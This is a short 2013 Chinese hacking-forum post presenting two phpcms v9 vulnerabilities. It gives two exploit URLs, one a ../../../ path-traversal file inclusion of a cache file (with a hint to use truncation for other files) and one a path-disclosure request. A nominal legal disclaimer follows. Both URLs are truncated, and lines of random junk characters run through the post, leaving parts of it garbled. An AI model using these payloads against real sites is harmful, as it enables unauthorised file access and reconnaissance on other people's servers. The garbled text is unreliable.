找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2141|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
% q$ @  I2 Y9 k+ a1 U: D/ {+ v6 S7 F' u9 |. i* |$ C$ M& g( J+ A" O
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck5 K" [7 }3 f/ {
+ E8 d+ l" T+ C8 U0 A
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
! J1 H7 p2 v$ k+ G6 c$ s. `8 G8 Y3 _8 V8 ~% r& F; U, p$ m2 W: e- u
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy( n0 @. N- ?( k

4 c$ V/ J! G8 ^#暴路径
0 {% ]- P0 o$ ?7 F! S& `" K6 D/ D1 R5 r' |0 T1 N. [/ m% F; Z% _
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。  }2 j& A* r; v, X; C

* S+ ]6 G9 ~  q  q% m- {" B7 A% o+ g! g7 L% q
/ t2 Q; L8 ~) H( s
+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表